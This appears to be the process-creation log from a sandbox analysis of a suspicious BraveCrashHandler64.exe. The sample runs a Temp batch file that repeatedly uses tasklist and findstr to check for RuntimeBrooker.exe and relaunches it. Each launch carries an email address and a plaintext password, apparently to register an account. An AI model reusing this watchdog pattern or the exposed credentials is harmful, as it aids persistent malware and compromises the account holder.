Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos
Source: C:\Users\user\Desktop\BraveCrashHandler64.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\12605RR4.bat" "C:\Users\user\Desktop\BraveCrashHandler64.exe""	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 1252	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
